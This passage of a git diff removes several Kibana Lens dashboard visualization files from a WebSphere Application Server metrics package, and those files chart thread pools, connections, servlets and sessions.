"labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea" - ], - "layerId": "f73c674c-32f9-437c-9556-c02eef1a0871", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "880644a5-cf8e-4cd1-a607-0982600b03fa", - "xAccessor": "c4abbc8f-c0f8-43de-aae9-ceeff9026807" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Total Connections In Use [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-443e1ff0-b49d-11ec-9a7c-ef3101c300f1", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f73c674c-32f9-437c-9556-c02eef1a0871", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-86426870-baec-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-86426870-baec-11ec-b244-51e5cddeab04.json deleted file mode 100644 index aa1949c749b..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-86426870-baec-11ec-b244-51e5cddeab04.json +++ /dev/null 
@@ -1,142 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "1decd051-dbf6-4a80-aa20-85278fedc2d4": { - "columnOrder": [ - "33936c70-d53c-4ccd-ba8d-f833c3b9dc3e", - "cce82f91-3637-4406-8633-bcd5bfe8a984", - "2b1baf93-2b7f-430d-9048-f11cb2bfb65e" - ], - "columns": { - "2b1baf93-2b7f-430d-9048-f11cb2bfb65e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.active: *" - }, - "isBucketed": false, - "label": "Active Threads", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.threads.active" - }, - "33936c70-d53c-4ccd-ba8d-f833c3b9dc3e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "cce82f91-3637-4406-8633-bcd5bfe8a984": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.threadpool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "2b1baf93-2b7f-430d-9048-f11cb2bfb65e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.active : * " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - 
"labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "2b1baf93-2b7f-430d-9048-f11cb2bfb65e" - ], - "layerId": "1decd051-dbf6-4a80-aa20-85278fedc2d4", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "cce82f91-3637-4406-8633-bcd5bfe8a984", - "xAccessor": "33936c70-d53c-4ccd-ba8d-f833c3b9dc3e" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Active Threads [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-86426870-baec-11ec-b244-51e5cddeab04", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-1decd051-dbf6-4a80-aa20-85278fedc2d4", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-888801c0-bae3-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-888801c0-bae3-11ec-b244-51e5cddeab04.json deleted file mode 100644 index 3a8e6a62013..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-888801c0-bae3-11ec-b244-51e5cddeab04.json +++ /dev/null 
@@ -1,161 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "5c2223d3-b3ba-45a2-848f-2a5e4ab9264c": { - "columnOrder": [ - "ea4d6628-e862-4e42-a8f3-59572a45894e", - "c4d4248d-67c1-454c-bea0-cfc45f7d43f9", - "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", - "b093e53a-a7e7-4b74-af63-b3da68cf3989" - ], - "columns": { - "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.total.created: *" - }, - "isBucketed": false, - "label": "Threads Created", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.total.created" - }, - "b093e53a-a7e7-4b74-af63-b3da68cf3989": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.total.destroyed: *" - }, - "isBucketed": false, - "label": "Threads Destroyed", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.total.destroyed" - }, - "c4d4248d-67c1-454c-bea0-cfc45f7d43f9": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.threadpool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - }, - "ea4d6628-e862-4e42-a8f3-59572a45894e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - 
"scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.total.created : * or websphere_application_server.threadpool.total.destroyed : * " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "4c4a2a46-6244-4e6b-8926-c1c60b6b9df4", - "b093e53a-a7e7-4b74-af63-b3da68cf3989" - ], - "layerId": "5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "c4d4248d-67c1-454c-bea0-cfc45f7d43f9", - "xAccessor": "ea4d6628-e862-4e42-a8f3-59572a45894e" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Thread Count" - } - }, - "title": "Number of Threads Created and Destroyed [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-888801c0-bae3-11ec-b244-51e5cddeab04", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file 
diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-8ce6ed80-b59d-11ec-888d-b1230de080fd.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-8ce6ed80-b59d-11ec-888d-b1230de080fd.json deleted file mode 100644 index a6723809043..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-8ce6ed80-b59d-11ec-888d-b1230de080fd.json +++ /dev/null 
@@ -1,178 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "6bff5182-8367-4e11-8b9a-69bfe903149c": { - "columnOrder": [ - "e5379b96-4137-4122-ae12-4043ff5f1d83", - "1b761837-dde2-418e-b754-b51432eaf95a", - "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1", - "302ef164-d49c-4a57-9a96-888917e2c880", - "302ef164-d49c-4a57-9a96-888917e2c880X0" - ], - "columns": { - "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.servlet.requests.processed: *" - }, - "isBucketed": false, - "label": "Requests Processed", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.servlet.requests.processed" - }, - "1b761837-dde2-418e-b754-b51432eaf95a": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of App name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.servlet.app_name" - }, - "302ef164-d49c-4a57-9a96-888917e2c880": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Responses Processed", - "operationType": "formula", - "params": { - "formula": "last_value(websphere_application_server.servlet.responses.processed)", - "isFormulaBroken": false - }, - "references": [ - "302ef164-d49c-4a57-9a96-888917e2c880X0" - ], - "scale": "ratio" - }, - "302ef164-d49c-4a57-9a96-888917e2c880X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.servlet.responses.processed: *" - }, - "isBucketed": false, - "label": 
"Part of Responses Processed", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.servlet.responses.processed" - }, - "e5379b96-4137-4122-ae12-4043ff5f1d83": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.servlet.requests.processed \u003e 0 or websphere_application_server.servlet.responses.processed \u003e 0" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "146c0baa-3fa2-4ae9-aa73-a4d7669d55c1", - "302ef164-d49c-4a57-9a96-888917e2c880" - ], - "layerId": "6bff5182-8367-4e11-8b9a-69bfe903149c", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "1b761837-dde2-418e-b754-b51432eaf95a", - "xAccessor": "e5379b96-4137-4122-ae12-4043ff5f1d83" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": false, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Count" - } - }, - "title": "Number of Processed Requests and Responses [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": 
"websphere_application_server-8ce6ed80-b59d-11ec-888d-b1230de080fd", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-6bff5182-8367-4e11-8b9a-69bfe903149c", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-b8c2dff0-baec-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-b8c2dff0-baec-11ec-b244-51e5cddeab04.json deleted file mode 100644 index b43bcf48694..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-b8c2dff0-baec-11ec-b244-51e5cddeab04.json +++ /dev/null 
@@ -1,142 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "8d78bbff-634f-4aff-9c25-d3f211b564eb": { - "columnOrder": [ - "665bf1e7-c3ab-45f6-acf3-05ed8ac3001d", - "55c60233-3c4c-4db2-b414-dc40ada3b503", - "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270" - ], - "columns": { - "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.total: *" - }, - "isBucketed": false, - "label": "Total Threads", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.threads.total" - }, - "55c60233-3c4c-4db2-b414-dc40ada3b503": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.threadpool.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - }, - "665bf1e7-c3ab-45f6-acf3-05ed8ac3001d": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.total : * " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { 
- "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "1b4e544c-2c46-4a4c-bff2-5f16ff6d9270" - ], - "layerId": "8d78bbff-634f-4aff-9c25-d3f211b564eb", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "55c60233-3c4c-4db2-b414-dc40ada3b503", - "xAccessor": "665bf1e7-c3ab-45f6-acf3-05ed8ac3001d" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - } - } - }, - "title": "Total Threads[Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-b8c2dff0-baec-11ec-b244-51e5cddeab04", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8d78bbff-634f-4aff-9c25-d3f211b564eb", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-d2cf3ac0-baeb-11ec-b244-51e5cddeab04.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-d2cf3ac0-baeb-11ec-b244-51e5cddeab04.json deleted file mode 100644 index 9f1db850fc4..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-d2cf3ac0-baeb-11ec-b244-51e5cddeab04.json +++ /dev/null 
@@ -1,127 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0": { - "columnOrder": [ - "2f965609-8b37-4e4d-9e83-20ef0901e869", - "6bd7c586-e630-4880-adb8-d82a050bda0c", - "83043110-a317-4821-8372-79219d3eae1e" - ], - "columns": { - "2f965609-8b37-4e4d-9e83-20ef0901e869": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Server Address", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "83043110-a317-4821-8372-79219d3eae1e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "server.address" - }, - "6bd7c586-e630-4880-adb8-d82a050bda0c": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "ThreadPool Name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "83043110-a317-4821-8372-79219d3eae1e", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.threadpool.name" - }, - "83043110-a317-4821-8372-79219d3eae1e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.total: *" - }, - "isBucketed": false, - "label": "Total Threads", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.threadpool.threads.total" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.threadpool.threads.total : * " - }, - "visualization": { - "columns": [ - { - "columnId": 
"2f965609-8b37-4e4d-9e83-20ef0901e869", - "isTransposed": false - }, - { - "columnId": "6bd7c586-e630-4880-adb8-d82a050bda0c", - "isTransposed": false - }, - { - "columnId": "83043110-a317-4821-8372-79219d3eae1e", - "isTransposed": false - } - ], - "layerId": "407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1, - "sorting": { - "columnId": "83043110-a317-4821-8372-79219d3eae1e", - "direction": "desc" - } - } - }, - "title": "Total Threads in Thread Pool [Metrics WebSphere Application Server]", - "visualizationType": "lnsDatatable" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-d2cf3ac0-baeb-11ec-b244-51e5cddeab04", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-e6d7d480-b59d-11ec-888d-b1230de080fd.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-e6d7d480-b59d-11ec-888d-b1230de080fd.json deleted file mode 100644 index 795411c54e6..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-e6d7d480-b59d-11ec-888d-b1230de080fd.json +++ /dev/null 
@@ -1,161 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "96a84b63-1fad-48c6-b0de-179dcbfcd741": { - "columnOrder": [ - "2760f523-a7b0-4dd9-adff-5743a44190f4", - "72a036b6-01af-4812-9bcf-f43429e39eb7", - "990fce2d-1026-4d37-85ed-088d392b41f9", - "d2e271e9-cc11-46df-aae0-121042e38bfa" - ], - "columns": { - "2760f523-a7b0-4dd9-adff-5743a44190f4": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "72a036b6-01af-4812-9bcf-f43429e39eb7": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of websphere_application_server.servlet.app_name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "990fce2d-1026-4d37-85ed-088d392b41f9", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "websphere_application_server.servlet.app_name" - }, - "990fce2d-1026-4d37-85ed-088d392b41f9": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.servlet.loaded: *" - }, - "isBucketed": false, - "label": "Loaded Servlets", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.servlet.loaded" - }, - "d2e271e9-cc11-46df-aae0-121042e38bfa": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "websphere_application_server.servlet.reloaded: *" - }, - "isBucketed": false, - "label": "Reloaded Servlets", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": 
"websphere_application_server.servlet.reloaded" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "websphere_application_server.servlet.loaded \u003e 0 or websphere_application_server.servlet.reloaded \u003e 0" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "990fce2d-1026-4d37-85ed-088d392b41f9", - "d2e271e9-cc11-46df-aae0-121042e38bfa" - ], - "layerId": "96a84b63-1fad-48c6-b0de-179dcbfcd741", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "72a036b6-01af-4812-9bcf-f43429e39eb7", - "xAccessor": "2760f523-a7b0-4dd9-adff-5743a44190f4" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Count" - } - }, - "title": "Number of Loaded and Reloaded Servlets [Metrics WebSphere Application Server]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-e6d7d480-b59d-11ec-888d-b1230de080fd", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-96a84b63-1fad-48c6-b0de-179dcbfcd741", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file 
diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-eab8b780-c07a-11ec-8552-f3dc1a6b95f9.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-eab8b780-c07a-11ec-8552-f3dc1a6b95f9.json deleted file mode 100644 index b415d333b15..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-eab8b780-c07a-11ec-8552-f3dc1a6b95f9.json +++ /dev/null 
@@ -1,91 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c": { - "columnOrder": [ - "b0fcb1bb-3640-4710-bb39-4e7ac9985961" - ], - "columns": { - "b0fcb1bb-3640-4710-bb39-4e7ac9985961": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Active Sessions", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.session_manager.sessions.active" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "bb425378-17d3-46b5-aab3-d274bdd9f097", - "key": "websphere_application_server.session_manager.sessions.active", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "websphere_application_server.session_manager.sessions.active" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "b0fcb1bb-3640-4710-bb39-4e7ac9985961", - "layerId": "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Active sessions [Metrics WebSphere Application Server]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-eab8b780-c07a-11ec-8552-f3dc1a6b95f9", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "bb425378-17d3-46b5-aab3-d274bdd9f097", - "type": "index-pattern" - } - ], - "type": "lens" 
-} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-ee7e7210-c07a-11ec-8552-f3dc1a6b95f9.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-ee7e7210-c07a-11ec-8552-f3dc1a6b95f9.json deleted file mode 100644 index 075e47c9223..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-ee7e7210-c07a-11ec-8552-f3dc1a6b95f9.json +++ /dev/null 
@@ -1,91 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c": { - "columnOrder": [ - "b0fcb1bb-3640-4710-bb39-4e7ac9985961" - ], - "columns": { - "b0fcb1bb-3640-4710-bb39-4e7ac9985961": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Created Sessions", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.session_manager.sessions.created" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "10b45b12-77b4-4241-a864-55c5b313cd40", - "key": "websphere_application_server.session_manager.sessions.created", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "websphere_application_server.session_manager.sessions.created" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "b0fcb1bb-3640-4710-bb39-4e7ac9985961", - "layerId": "0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Created sessions [Metrics WebSphere Application Server]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-ee7e7210-c07a-11ec-8552-f3dc1a6b95f9", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0ebc90f5-04f1-45fe-bd63-d4c13a7dd62c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "10b45b12-77b4-4241-a864-55c5b313cd40", - "type": "index-pattern" - } - ], - "type": 
"lens" -} \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/lens/websphere_application_server-f28f6670-c07a-11ec-8552-f3dc1a6b95f9.json b/packages/websphere_application_server/kibana/lens/websphere_application_server-f28f6670-c07a-11ec-8552-f3dc1a6b95f9.json deleted file mode 100644 index 6d9e8a6ae6f..00000000000 --- a/packages/websphere_application_server/kibana/lens/websphere_application_server-f28f6670-c07a-11ec-8552-f3dc1a6b95f9.json +++ /dev/null 
